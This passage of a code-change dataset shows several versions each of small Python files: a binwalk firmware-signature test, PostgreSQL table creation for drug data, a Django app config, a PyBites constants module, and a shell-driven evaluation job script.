"step-3": "from os.path import dirname\nimport binwalk\nfrom nose.tools import eq_, ok_\n\n\ndef test_firmware_squashfs():\n \"\"\"\n Test: Open hello-world.srec, scan for signatures\n verify that only one signature is returned\n verify that the only signature returned is Motorola S-rec data-signature\n \"\"\"\n expected_results = [[0,\n 'DLOB firmware header, boot partition: \"dev=/dev/mtdblock/2\"'], [\n 112,\n 'LZMA compressed data, properties: 0x5D, dictionary size: 33554432 bytes, uncompressed size: 3466208 bytes'\n ], [1179760,\n 'PackImg section delimiter tag, little endian size: 11548416 bytes; big endian size: 3649536 bytes'\n ], [1179792,\n 'Squashfs filesystem, little endian, version 4.0, compression:lzma, size: 3647665 bytes, 1811 inodes, blocksize: 524288 bytes, created: 2013-09-17 06:43:22'\n ]]\n scan_result = binwalk.scan(dirname(__file__) +\n '/input-vectors/firmware.squashfs', signature=True, quiet=True,\n extract=True)\n eq_(len(scan_result), 1)\n eq_(len(scan_result[0].results), len(expected_results))\n for i in range(0, len(scan_result[0].results)):\n eq_(scan_result[0].results[i].offset, expected_results[i][0])\n eq_(scan_result[0].results[i].description, expected_results[i][1])\n",
"step-4": "from os.path import dirname\n\nimport binwalk\nfrom nose.tools import eq_, ok_\n\n\ndef test_firmware_squashfs():\n '''\n Test: Open hello-world.srec, scan for signatures\n verify that only one signature is returned\n verify that the only signature returned is Motorola S-rec data-signature\n '''\n expected_results = [\n [0, 'DLOB firmware header, boot partition: \"dev=/dev/mtdblock/2\"'],\n [112, 'LZMA compressed data, properties: 0x5D, dictionary size: 33554432 bytes, uncompressed size: 3466208 bytes'],\n [1179760, 'PackImg section delimiter tag, little endian size: 11548416 bytes; big endian size: 3649536 bytes'],\n [1179792, 'Squashfs filesystem, little endian, version 4.0, compression:lzma, size: 3647665 bytes, 1811 inodes, blocksize: 524288 bytes, created: 2013-09-17 06:43:22'],\n ]\n\n scan_result = binwalk.scan(\n dirname(__file__) + '/input-vectors/firmware.squashfs',\n signature=True,\n quiet=True,\n extract=True) # Throws a warning for missing external extractor\n # Test number of modules used\n eq_(len(scan_result), 1)\n # Test number of results for that module\n eq_(len(scan_result[0].results), len(expected_results))\n # Test result-description\n for i in range(0, len(scan_result[0].results)):\n eq_(scan_result[0].results[i].offset, expected_results[i][0])\n eq_(scan_result[0].results[i].description, expected_results[i][1])\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
def create_tables(db_engine):
"""RUN SQL STATEMENTS TO CREATE TABLES"""
with db_engine.connect() as conn:
create_table_stmts = []
create_drugs_table = """
DROP TABLE IF EXISTS drugs CASCADE;
CREATE TABLE drugs (
drugbank_id char(7) PRIMARY KEY,
name varchar NOT NULL, -- Something “Human Readable”,
smiles varchar
);
"""
create_table_stmts.append(create_drugs_table)
create_drug_id_types_table = """
DROP TABLE IF EXISTS drug_identifier_types CASCADE;
CREATE TABLE drug_identifier_types (
identifier_type_id SERIAL UNIQUE,
identifier_type_name varchar UNIQUE
);
"""
create_table_stmts.append(create_drug_id_types_table)
create_drug_identifiers_table = """
DROP TABLE IF EXISTS drug_identifiers CASCADE;
CREATE TABLE drug_identifiers (
drugbank_id char(7) references drugs(drugbank_id),
alt_identifier_value varchar NOT NULL,
alt_identifier_type_id int references drug_identifier_types(identifier_type_id) NOT NULL,
alt_identifier_url varchar
);
"""
create_table_stmts.append(create_drug_identifiers_table)
create_drug_action_types = """
DROP TABLE IF EXISTS drug_action_types CASCADE;
CREATE TABLE drug_action_types (
action_type_id SERIAL UNIQUE,
action_type varchar UNIQUE
);
"""
create_table_stmts.append(create_drug_action_types)
create_drug_targets_table = """
DROP TABLE IF EXISTS drug_targets CASCADE;
CREATE TABLE drug_targets (
drugbank_id char(7) references drugs(drugbank_id),
gene_name varchar NOT NULL,
action_type_id int references drug_action_types(action_type_id),
UNIQUE(drugbank_id, gene_name, action_type_id)
);
"""
create_table_stmts.append(create_drug_targets_table)
logger.info('Creating %d tables', len(create_table_stmts))
for stmt in tqdm(create_table_stmts):
conn.execute(stmt)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
logger.setLevel(logging.INFO)
def create_tables(db_engine):
"""RUN SQL STATEMENTS TO CREATE TABLES"""
with db_engine.connect() as conn:
create_table_stmts = []
create_drugs_table = """
DROP TABLE IF EXISTS drugs CASCADE;
CREATE TABLE drugs (
drugbank_id char(7) PRIMARY KEY,
name varchar NOT NULL, -- Something “Human Readable”,
smiles varchar
);
"""
create_table_stmts.append(create_drugs_table)
create_drug_id_types_table = """
DROP TABLE IF EXISTS drug_identifier_types CASCADE;
CREATE TABLE drug_identifier_types (
identifier_type_id SERIAL UNIQUE,
identifier_type_name varchar UNIQUE
);
"""
create_table_stmts.append(create_drug_id_types_table)
create_drug_identifiers_table = """
DROP TABLE IF EXISTS drug_identifiers CASCADE;
CREATE TABLE drug_identifiers (
drugbank_id char(7) references drugs(drugbank_id),
alt_identifier_value varchar NOT NULL,
alt_identifier_type_id int references drug_identifier_types(identifier_type_id) NOT NULL,
alt_identifier_url varchar
);
"""
create_table_stmts.append(create_drug_identifiers_table)
create_drug_action_types = """
DROP TABLE IF EXISTS drug_action_types CASCADE;
CREATE TABLE drug_action_types (
action_type_id SERIAL UNIQUE,
action_type varchar UNIQUE
);
"""
create_table_stmts.append(create_drug_action_types)
create_drug_targets_table = """
DROP TABLE IF EXISTS drug_targets CASCADE;
CREATE TABLE drug_targets (
drugbank_id char(7) references drugs(drugbank_id),
gene_name varchar NOT NULL,
action_type_id int references drug_action_types(action_type_id),
UNIQUE(drugbank_id, gene_name, action_type_id)
);
"""
create_table_stmts.append(create_drug_targets_table)
logger.info('Creating %d tables', len(create_table_stmts))
for stmt in tqdm(create_table_stmts):
conn.execute(stmt)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
def create_tables(db_engine):
"""RUN SQL STATEMENTS TO CREATE TABLES"""
with db_engine.connect() as conn:
create_table_stmts = []
create_drugs_table = """
DROP TABLE IF EXISTS drugs CASCADE;
CREATE TABLE drugs (
drugbank_id char(7) PRIMARY KEY,
name varchar NOT NULL, -- Something “Human Readable”,
smiles varchar
);
"""
create_table_stmts.append(create_drugs_table)
create_drug_id_types_table = """
DROP TABLE IF EXISTS drug_identifier_types CASCADE;
CREATE TABLE drug_identifier_types (
identifier_type_id SERIAL UNIQUE,
identifier_type_name varchar UNIQUE
);
"""
create_table_stmts.append(create_drug_id_types_table)
create_drug_identifiers_table = """
DROP TABLE IF EXISTS drug_identifiers CASCADE;
CREATE TABLE drug_identifiers (
drugbank_id char(7) references drugs(drugbank_id),
alt_identifier_value varchar NOT NULL,
alt_identifier_type_id int references drug_identifier_types(identifier_type_id) NOT NULL,
alt_identifier_url varchar
);
"""
create_table_stmts.append(create_drug_identifiers_table)
create_drug_action_types = """
DROP TABLE IF EXISTS drug_action_types CASCADE;
CREATE TABLE drug_action_types (
action_type_id SERIAL UNIQUE,
action_type varchar UNIQUE
);
"""
create_table_stmts.append(create_drug_action_types)
create_drug_targets_table = """
DROP TABLE IF EXISTS drug_targets CASCADE;
CREATE TABLE drug_targets (
drugbank_id char(7) references drugs(drugbank_id),
gene_name varchar NOT NULL,
action_type_id int references drug_action_types(action_type_id),
UNIQUE(drugbank_id, gene_name, action_type_id)
);
"""
create_table_stmts.append(create_drug_targets_table)
logger.info('Creating %d tables', len(create_table_stmts))
for stmt in tqdm(create_table_stmts):
conn.execute(stmt)
<|reserved_special_token_1|>
import logging
from tqdm import tqdm
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
def create_tables(db_engine):
"""RUN SQL STATEMENTS TO CREATE TABLES"""
with db_engine.connect() as conn:
create_table_stmts = []
create_drugs_table = """
DROP TABLE IF EXISTS drugs CASCADE;
CREATE TABLE drugs (
drugbank_id char(7) PRIMARY KEY,
name varchar NOT NULL, -- Something “Human Readable”,
smiles varchar
);
"""
create_table_stmts.append(create_drugs_table)
create_drug_id_types_table = """
DROP TABLE IF EXISTS drug_identifier_types CASCADE;
CREATE TABLE drug_identifier_types (
identifier_type_id SERIAL UNIQUE,
identifier_type_name varchar UNIQUE
);
"""
create_table_stmts.append(create_drug_id_types_table)
create_drug_identifiers_table = """
DROP TABLE IF EXISTS drug_identifiers CASCADE;
CREATE TABLE drug_identifiers (
drugbank_id char(7) references drugs(drugbank_id),
alt_identifier_value varchar NOT NULL,
alt_identifier_type_id int references drug_identifier_types(identifier_type_id) NOT NULL,
alt_identifier_url varchar
);
"""
create_table_stmts.append(create_drug_identifiers_table)
create_drug_action_types = """
DROP TABLE IF EXISTS drug_action_types CASCADE;
CREATE TABLE drug_action_types (
action_type_id SERIAL UNIQUE,
action_type varchar UNIQUE
);
"""
create_table_stmts.append(create_drug_action_types)
create_drug_targets_table = """
DROP TABLE IF EXISTS drug_targets CASCADE;
CREATE TABLE drug_targets (
drugbank_id char(7) references drugs(drugbank_id),
gene_name varchar NOT NULL,
action_type_id int references drug_action_types(action_type_id),
UNIQUE(drugbank_id, gene_name, action_type_id)
);
"""
create_table_stmts.append(create_drug_targets_table)
logger.info('Creating %d tables', len(create_table_stmts))
for stmt in tqdm(create_table_stmts):
conn.execute(stmt)
<|reserved_special_token_1|>
import logging
from tqdm import tqdm
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
def create_tables(db_engine):
"""RUN SQL STATEMENTS TO CREATE TABLES"""
with db_engine.connect() as conn:
create_table_stmts = []
create_drugs_table = """
DROP TABLE IF EXISTS drugs CASCADE;
CREATE TABLE drugs (
drugbank_id char(7) PRIMARY KEY,
name varchar NOT NULL, -- Something “Human Readable”,
smiles varchar
);
"""
create_table_stmts.append(create_drugs_table)
create_drug_id_types_table = """
DROP TABLE IF EXISTS drug_identifier_types CASCADE;
CREATE TABLE drug_identifier_types (
identifier_type_id SERIAL UNIQUE,
identifier_type_name varchar UNIQUE
);
"""
create_table_stmts.append(create_drug_id_types_table)
create_drug_identifiers_table = """
DROP TABLE IF EXISTS drug_identifiers CASCADE;
CREATE TABLE drug_identifiers (
drugbank_id char(7) references drugs(drugbank_id),
alt_identifier_value varchar NOT NULL,
alt_identifier_type_id int references drug_identifier_types(identifier_type_id) NOT NULL,
alt_identifier_url varchar
);
"""
create_table_stmts.append(create_drug_identifiers_table)
create_drug_action_types = """
DROP TABLE IF EXISTS drug_action_types CASCADE;
CREATE TABLE drug_action_types (
action_type_id SERIAL UNIQUE,
action_type varchar UNIQUE
);
"""
create_table_stmts.append(create_drug_action_types)
create_drug_targets_table = """
DROP TABLE IF EXISTS drug_targets CASCADE;
CREATE TABLE drug_targets (
drugbank_id char(7) references drugs(drugbank_id),
gene_name varchar NOT NULL,
action_type_id int references drug_action_types(action_type_id),
UNIQUE(drugbank_id, gene_name, action_type_id)
);
"""
create_table_stmts.append(create_drug_targets_table)
logger.info("Creating %d tables", len(create_table_stmts))
for stmt in tqdm(create_table_stmts):
conn.execute(stmt)
|
flexible
|
{
"blob_id": "f4c3b6ee6389b31c6a280bf7cfe920a2791c1299",
"index": 4125,
"step-1": "<mask token>\n\n\ndef create_tables(db_engine):\n \"\"\"RUN SQL STATEMENTS TO CREATE TABLES\"\"\"\n with db_engine.connect() as conn:\n create_table_stmts = []\n create_drugs_table = \"\"\"\n DROP TABLE IF EXISTS drugs CASCADE; \n CREATE TABLE drugs (\n drugbank_id char(7) PRIMARY KEY,\n name varchar NOT NULL, -- Something “Human Readable”,\n smiles varchar\n );\n \"\"\"\n create_table_stmts.append(create_drugs_table)\n create_drug_id_types_table = \"\"\"\n DROP TABLE IF EXISTS drug_identifier_types CASCADE; \n CREATE TABLE drug_identifier_types (\n identifier_type_id SERIAL UNIQUE, \n identifier_type_name varchar UNIQUE\n ); \n \"\"\"\n create_table_stmts.append(create_drug_id_types_table)\n create_drug_identifiers_table = \"\"\"\n DROP TABLE IF EXISTS drug_identifiers CASCADE;\n CREATE TABLE drug_identifiers (\n drugbank_id char(7) references drugs(drugbank_id),\n alt_identifier_value varchar NOT NULL,\n alt_identifier_type_id int references drug_identifier_types(identifier_type_id) NOT NULL,\n alt_identifier_url varchar\n );\n \"\"\"\n create_table_stmts.append(create_drug_identifiers_table)\n create_drug_action_types = \"\"\"\n DROP TABLE IF EXISTS drug_action_types CASCADE;\n CREATE TABLE drug_action_types (\n action_type_id SERIAL UNIQUE, \n action_type varchar UNIQUE\n );\n \"\"\"\n create_table_stmts.append(create_drug_action_types)\n create_drug_targets_table = \"\"\"\n DROP TABLE IF EXISTS drug_targets CASCADE;\n CREATE TABLE drug_targets (\n drugbank_id char(7) references drugs(drugbank_id),\n gene_name varchar NOT NULL, \n action_type_id int references drug_action_types(action_type_id),\n UNIQUE(drugbank_id, gene_name, action_type_id)\n );\n \"\"\"\n create_table_stmts.append(create_drug_targets_table)\n logger.info('Creating %d tables', len(create_table_stmts))\n for stmt in tqdm(create_table_stmts):\n conn.execute(stmt)\n",
"step-2": "<mask token>\nlogger.setLevel(logging.INFO)\n\n\ndef create_tables(db_engine):\n \"\"\"RUN SQL STATEMENTS TO CREATE TABLES\"\"\"\n with db_engine.connect() as conn:\n create_table_stmts = []\n create_drugs_table = \"\"\"\n DROP TABLE IF EXISTS drugs CASCADE; \n CREATE TABLE drugs (\n drugbank_id char(7) PRIMARY KEY,\n name varchar NOT NULL, -- Something “Human Readable”,\n smiles varchar\n );\n \"\"\"\n create_table_stmts.append(create_drugs_table)\n create_drug_id_types_table = \"\"\"\n DROP TABLE IF EXISTS drug_identifier_types CASCADE; \n CREATE TABLE drug_identifier_types (\n identifier_type_id SERIAL UNIQUE, \n identifier_type_name varchar UNIQUE\n ); \n \"\"\"\n create_table_stmts.append(create_drug_id_types_table)\n create_drug_identifiers_table = \"\"\"\n DROP TABLE IF EXISTS drug_identifiers CASCADE;\n CREATE TABLE drug_identifiers (\n drugbank_id char(7) references drugs(drugbank_id),\n alt_identifier_value varchar NOT NULL,\n alt_identifier_type_id int references drug_identifier_types(identifier_type_id) NOT NULL,\n alt_identifier_url varchar\n );\n \"\"\"\n create_table_stmts.append(create_drug_identifiers_table)\n create_drug_action_types = \"\"\"\n DROP TABLE IF EXISTS drug_action_types CASCADE;\n CREATE TABLE drug_action_types (\n action_type_id SERIAL UNIQUE, \n action_type varchar UNIQUE\n );\n \"\"\"\n create_table_stmts.append(create_drug_action_types)\n create_drug_targets_table = \"\"\"\n DROP TABLE IF EXISTS drug_targets CASCADE;\n CREATE TABLE drug_targets (\n drugbank_id char(7) references drugs(drugbank_id),\n gene_name varchar NOT NULL, \n action_type_id int references drug_action_types(action_type_id),\n UNIQUE(drugbank_id, gene_name, action_type_id)\n );\n \"\"\"\n create_table_stmts.append(create_drug_targets_table)\n logger.info('Creating %d tables', len(create_table_stmts))\n for stmt in tqdm(create_table_stmts):\n conn.execute(stmt)\n",
"step-3": "<mask token>\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.INFO)\n\n\ndef create_tables(db_engine):\n \"\"\"RUN SQL STATEMENTS TO CREATE TABLES\"\"\"\n with db_engine.connect() as conn:\n create_table_stmts = []\n create_drugs_table = \"\"\"\n DROP TABLE IF EXISTS drugs CASCADE; \n CREATE TABLE drugs (\n drugbank_id char(7) PRIMARY KEY,\n name varchar NOT NULL, -- Something “Human Readable”,\n smiles varchar\n );\n \"\"\"\n create_table_stmts.append(create_drugs_table)\n create_drug_id_types_table = \"\"\"\n DROP TABLE IF EXISTS drug_identifier_types CASCADE; \n CREATE TABLE drug_identifier_types (\n identifier_type_id SERIAL UNIQUE, \n identifier_type_name varchar UNIQUE\n ); \n \"\"\"\n create_table_stmts.append(create_drug_id_types_table)\n create_drug_identifiers_table = \"\"\"\n DROP TABLE IF EXISTS drug_identifiers CASCADE;\n CREATE TABLE drug_identifiers (\n drugbank_id char(7) references drugs(drugbank_id),\n alt_identifier_value varchar NOT NULL,\n alt_identifier_type_id int references drug_identifier_types(identifier_type_id) NOT NULL,\n alt_identifier_url varchar\n );\n \"\"\"\n create_table_stmts.append(create_drug_identifiers_table)\n create_drug_action_types = \"\"\"\n DROP TABLE IF EXISTS drug_action_types CASCADE;\n CREATE TABLE drug_action_types (\n action_type_id SERIAL UNIQUE, \n action_type varchar UNIQUE\n );\n \"\"\"\n create_table_stmts.append(create_drug_action_types)\n create_drug_targets_table = \"\"\"\n DROP TABLE IF EXISTS drug_targets CASCADE;\n CREATE TABLE drug_targets (\n drugbank_id char(7) references drugs(drugbank_id),\n gene_name varchar NOT NULL, \n action_type_id int references drug_action_types(action_type_id),\n UNIQUE(drugbank_id, gene_name, action_type_id)\n );\n \"\"\"\n create_table_stmts.append(create_drug_targets_table)\n logger.info('Creating %d tables', len(create_table_stmts))\n for stmt in tqdm(create_table_stmts):\n conn.execute(stmt)\n",
"step-4": "import logging\nfrom tqdm import tqdm\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.INFO)\n\n\ndef create_tables(db_engine):\n \"\"\"RUN SQL STATEMENTS TO CREATE TABLES\"\"\"\n with db_engine.connect() as conn:\n create_table_stmts = []\n create_drugs_table = \"\"\"\n DROP TABLE IF EXISTS drugs CASCADE; \n CREATE TABLE drugs (\n drugbank_id char(7) PRIMARY KEY,\n name varchar NOT NULL, -- Something “Human Readable”,\n smiles varchar\n );\n \"\"\"\n create_table_stmts.append(create_drugs_table)\n create_drug_id_types_table = \"\"\"\n DROP TABLE IF EXISTS drug_identifier_types CASCADE; \n CREATE TABLE drug_identifier_types (\n identifier_type_id SERIAL UNIQUE, \n identifier_type_name varchar UNIQUE\n ); \n \"\"\"\n create_table_stmts.append(create_drug_id_types_table)\n create_drug_identifiers_table = \"\"\"\n DROP TABLE IF EXISTS drug_identifiers CASCADE;\n CREATE TABLE drug_identifiers (\n drugbank_id char(7) references drugs(drugbank_id),\n alt_identifier_value varchar NOT NULL,\n alt_identifier_type_id int references drug_identifier_types(identifier_type_id) NOT NULL,\n alt_identifier_url varchar\n );\n \"\"\"\n create_table_stmts.append(create_drug_identifiers_table)\n create_drug_action_types = \"\"\"\n DROP TABLE IF EXISTS drug_action_types CASCADE;\n CREATE TABLE drug_action_types (\n action_type_id SERIAL UNIQUE, \n action_type varchar UNIQUE\n );\n \"\"\"\n create_table_stmts.append(create_drug_action_types)\n create_drug_targets_table = \"\"\"\n DROP TABLE IF EXISTS drug_targets CASCADE;\n CREATE TABLE drug_targets (\n drugbank_id char(7) references drugs(drugbank_id),\n gene_name varchar NOT NULL, \n action_type_id int references drug_action_types(action_type_id),\n UNIQUE(drugbank_id, gene_name, action_type_id)\n );\n \"\"\"\n create_table_stmts.append(create_drug_targets_table)\n logger.info('Creating %d tables', len(create_table_stmts))\n for stmt in tqdm(create_table_stmts):\n conn.execute(stmt)\n",
"step-5": "import logging\n\nfrom tqdm import tqdm\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.INFO)\n\n\ndef create_tables(db_engine):\n \"\"\"RUN SQL STATEMENTS TO CREATE TABLES\"\"\"\n\n with db_engine.connect() as conn:\n create_table_stmts = []\n\n create_drugs_table = \"\"\"\n DROP TABLE IF EXISTS drugs CASCADE; \n CREATE TABLE drugs (\n drugbank_id char(7) PRIMARY KEY,\n name varchar NOT NULL, -- Something “Human Readable”,\n smiles varchar\n );\n \"\"\"\n\n create_table_stmts.append(create_drugs_table)\n\n create_drug_id_types_table = \"\"\"\n DROP TABLE IF EXISTS drug_identifier_types CASCADE; \n CREATE TABLE drug_identifier_types (\n identifier_type_id SERIAL UNIQUE, \n identifier_type_name varchar UNIQUE\n ); \n \"\"\"\n create_table_stmts.append(create_drug_id_types_table)\n\n create_drug_identifiers_table = \"\"\"\n DROP TABLE IF EXISTS drug_identifiers CASCADE;\n CREATE TABLE drug_identifiers (\n drugbank_id char(7) references drugs(drugbank_id),\n alt_identifier_value varchar NOT NULL,\n alt_identifier_type_id int references drug_identifier_types(identifier_type_id) NOT NULL,\n alt_identifier_url varchar\n );\n \"\"\"\n create_table_stmts.append(create_drug_identifiers_table)\n\n create_drug_action_types = \"\"\"\n DROP TABLE IF EXISTS drug_action_types CASCADE;\n CREATE TABLE drug_action_types (\n action_type_id SERIAL UNIQUE, \n action_type varchar UNIQUE\n );\n \"\"\"\n create_table_stmts.append(create_drug_action_types)\n\n create_drug_targets_table = \"\"\"\n DROP TABLE IF EXISTS drug_targets CASCADE;\n CREATE TABLE drug_targets (\n drugbank_id char(7) references drugs(drugbank_id),\n gene_name varchar NOT NULL, \n action_type_id int references drug_action_types(action_type_id),\n UNIQUE(drugbank_id, gene_name, action_type_id)\n );\n \"\"\"\n create_table_stmts.append(create_drug_targets_table)\n\n logger.info(\"Creating %d tables\", len(create_table_stmts))\n for stmt in tqdm(create_table_stmts):\n conn.execute(stmt)\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
from django.apps import AppConfig
class NombreaplicacionConfig(AppConfig):
name = 'nombreAplicacion'
|
normal
|
{
"blob_id": "0c7efa99dc22154f9835b277cba5057b213a28e7",
"index": 2414,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass NombreaplicacionConfig(AppConfig):\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass NombreaplicacionConfig(AppConfig):\n name = 'nombreAplicacion'\n",
"step-4": "from django.apps import AppConfig\n\n\nclass NombreaplicacionConfig(AppConfig):\n name = 'nombreAplicacion'\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
TMP = getenv('TMP', '/tmp')
PYBITES_FAKER_DIR = Path(getenv('PYBITES_FAKER_DIR', TMP))
CACHE_FILENAME = 'pybites-fake-data.pkl'
FAKE_DATA_CACHE = PYBITES_FAKER_DIR / CACHE_FILENAME
BITE_FEED = 'https://codechalleng.es/api/bites/'
BLOG_FEED = 'https://pybit.es/feeds/all.rss.xml'
Bite = namedtuple('Bite', 'number title level')
Article = namedtuple('Article', 'author title tags')
<|reserved_special_token_1|>
from collections import namedtuple
from os import getenv
from pathlib import Path
TMP = getenv('TMP', '/tmp')
PYBITES_FAKER_DIR = Path(getenv('PYBITES_FAKER_DIR', TMP))
CACHE_FILENAME = 'pybites-fake-data.pkl'
FAKE_DATA_CACHE = PYBITES_FAKER_DIR / CACHE_FILENAME
BITE_FEED = 'https://codechalleng.es/api/bites/'
BLOG_FEED = 'https://pybit.es/feeds/all.rss.xml'
Bite = namedtuple('Bite', 'number title level')
Article = namedtuple('Article', 'author title tags')
<|reserved_special_token_1|>
from collections import namedtuple
from os import getenv
from pathlib import Path
TMP = getenv("TMP", "/tmp")
PYBITES_FAKER_DIR = Path(getenv("PYBITES_FAKER_DIR", TMP))
CACHE_FILENAME = "pybites-fake-data.pkl"
FAKE_DATA_CACHE = PYBITES_FAKER_DIR / CACHE_FILENAME
BITE_FEED = "https://codechalleng.es/api/bites/"
BLOG_FEED = "https://pybit.es/feeds/all.rss.xml"
Bite = namedtuple("Bite", "number title level")
Article = namedtuple("Article", "author title tags")
|
flexible
|
{
"blob_id": "7336b8dec95d23cbcebbff2a813bbbd5575ba58f",
"index": 2327,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nTMP = getenv('TMP', '/tmp')\nPYBITES_FAKER_DIR = Path(getenv('PYBITES_FAKER_DIR', TMP))\nCACHE_FILENAME = 'pybites-fake-data.pkl'\nFAKE_DATA_CACHE = PYBITES_FAKER_DIR / CACHE_FILENAME\nBITE_FEED = 'https://codechalleng.es/api/bites/'\nBLOG_FEED = 'https://pybit.es/feeds/all.rss.xml'\nBite = namedtuple('Bite', 'number title level')\nArticle = namedtuple('Article', 'author title tags')\n",
"step-3": "from collections import namedtuple\nfrom os import getenv\nfrom pathlib import Path\nTMP = getenv('TMP', '/tmp')\nPYBITES_FAKER_DIR = Path(getenv('PYBITES_FAKER_DIR', TMP))\nCACHE_FILENAME = 'pybites-fake-data.pkl'\nFAKE_DATA_CACHE = PYBITES_FAKER_DIR / CACHE_FILENAME\nBITE_FEED = 'https://codechalleng.es/api/bites/'\nBLOG_FEED = 'https://pybit.es/feeds/all.rss.xml'\nBite = namedtuple('Bite', 'number title level')\nArticle = namedtuple('Article', 'author title tags')\n",
"step-4": "from collections import namedtuple\nfrom os import getenv\nfrom pathlib import Path\n\nTMP = getenv(\"TMP\", \"/tmp\")\nPYBITES_FAKER_DIR = Path(getenv(\"PYBITES_FAKER_DIR\", TMP))\nCACHE_FILENAME = \"pybites-fake-data.pkl\"\nFAKE_DATA_CACHE = PYBITES_FAKER_DIR / CACHE_FILENAME\nBITE_FEED = \"https://codechalleng.es/api/bites/\"\nBLOG_FEED = \"https://pybit.es/feeds/all.rss.xml\"\n\nBite = namedtuple(\"Bite\", \"number title level\")\nArticle = namedtuple(\"Article\", \"author title tags\")\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
#!/usr/bin/env python3
import subprocess
import sys
import pickle
if len(sys.argv) != 3:
print('Usage: std_dev_eval.py <std_dir> <ans>')
quit()
std_dir=sys.argv[1]
std_ans=sys.argv[2]
subprocess.call('rm -f {}/result'.format(std_dir), shell=True)
op_f = open('{}/jobs'.format(std_dir), 'w')
command = 'utils/single_query_example.py'
query = std_dir + '/query.pkl'
doc = std_dir + '/doc.pkl'
with open(query, 'rb') as fp:
query_num = len(pickle.load(fp))
for idx in range(query_num):
op_f.write('{} {} {} {} {} >>{}/querywise_result\n'.format(
command, query, doc, idx, std_ans, std_dir))
op_f.close()
subprocess.call('cat {}/jobs | parallel --no-notice -j 4 '.format(std_dir), shell=True)
subprocess.call('rm {}/*.pkl'.format(std_dir), shell=True)
subprocess.call('utils/calculate_std_average_result.py {}/querywise_result >{}/MAP'.format(std_dir, std_dir), shell=True)
|
normal
|
{
"blob_id": "ba216642935d19b85e379b66fb514854ebcdedd9",
"index": 666,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nif len(sys.argv) != 3:\n print('Usage: std_dev_eval.py <std_dir> <ans>')\n quit()\n<mask token>\nsubprocess.call('rm -f {}/result'.format(std_dir), shell=True)\n<mask token>\nwith open(query, 'rb') as fp:\n query_num = len(pickle.load(fp))\nfor idx in range(query_num):\n op_f.write('{} {} {} {} {} >>{}/querywise_result\\n'.format(command,\n query, doc, idx, std_ans, std_dir))\nop_f.close()\nsubprocess.call('cat {}/jobs | parallel --no-notice -j 4 '.format(std_dir),\n shell=True)\nsubprocess.call('rm {}/*.pkl'.format(std_dir), shell=True)\nsubprocess.call(\n 'utils/calculate_std_average_result.py {}/querywise_result >{}/MAP'.\n format(std_dir, std_dir), shell=True)\n",
"step-3": "<mask token>\nif len(sys.argv) != 3:\n print('Usage: std_dev_eval.py <std_dir> <ans>')\n quit()\nstd_dir = sys.argv[1]\nstd_ans = sys.argv[2]\nsubprocess.call('rm -f {}/result'.format(std_dir), shell=True)\nop_f = open('{}/jobs'.format(std_dir), 'w')\ncommand = 'utils/single_query_example.py'\nquery = std_dir + '/query.pkl'\ndoc = std_dir + '/doc.pkl'\nwith open(query, 'rb') as fp:\n query_num = len(pickle.load(fp))\nfor idx in range(query_num):\n op_f.write('{} {} {} {} {} >>{}/querywise_result\\n'.format(command,\n query, doc, idx, std_ans, std_dir))\nop_f.close()\nsubprocess.call('cat {}/jobs | parallel --no-notice -j 4 '.format(std_dir),\n shell=True)\nsubprocess.call('rm {}/*.pkl'.format(std_dir), shell=True)\nsubprocess.call(\n 'utils/calculate_std_average_result.py {}/querywise_result >{}/MAP'.\n format(std_dir, std_dir), shell=True)\n",
"step-4": "import subprocess\nimport sys\nimport pickle\nif len(sys.argv) != 3:\n print('Usage: std_dev_eval.py <std_dir> <ans>')\n quit()\nstd_dir = sys.argv[1]\nstd_ans = sys.argv[2]\nsubprocess.call('rm -f {}/result'.format(std_dir), shell=True)\nop_f = open('{}/jobs'.format(std_dir), 'w')\ncommand = 'utils/single_query_example.py'\nquery = std_dir + '/query.pkl'\ndoc = std_dir + '/doc.pkl'\nwith open(query, 'rb') as fp:\n query_num = len(pickle.load(fp))\nfor idx in range(query_num):\n op_f.write('{} {} {} {} {} >>{}/querywise_result\\n'.format(command,\n query, doc, idx, std_ans, std_dir))\nop_f.close()\nsubprocess.call('cat {}/jobs | parallel --no-notice -j 4 '.format(std_dir),\n shell=True)\nsubprocess.call('rm {}/*.pkl'.format(std_dir), shell=True)\nsubprocess.call(\n 'utils/calculate_std_average_result.py {}/querywise_result >{}/MAP'.\n format(std_dir, std_dir), shell=True)\n",
"step-5": "#!/usr/bin/env python3\nimport subprocess\nimport sys\nimport pickle\n\nif len(sys.argv) != 3:\n print('Usage: std_dev_eval.py <std_dir> <ans>')\n quit()\n\nstd_dir=sys.argv[1]\nstd_ans=sys.argv[2]\n\nsubprocess.call('rm -f {}/result'.format(std_dir), shell=True)\n\nop_f = open('{}/jobs'.format(std_dir), 'w')\n\ncommand = 'utils/single_query_example.py'\nquery = std_dir + '/query.pkl'\ndoc = std_dir + '/doc.pkl'\n\nwith open(query, 'rb') as fp:\n query_num = len(pickle.load(fp))\n\nfor idx in range(query_num):\n op_f.write('{} {} {} {} {} >>{}/querywise_result\\n'.format(\n command, query, doc, idx, std_ans, std_dir))\nop_f.close()\n\nsubprocess.call('cat {}/jobs | parallel --no-notice -j 4 '.format(std_dir), shell=True)\nsubprocess.call('rm {}/*.pkl'.format(std_dir), shell=True)\nsubprocess.call('utils/calculate_std_average_result.py {}/querywise_result >{}/MAP'.format(std_dir, std_dir), shell=True)\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
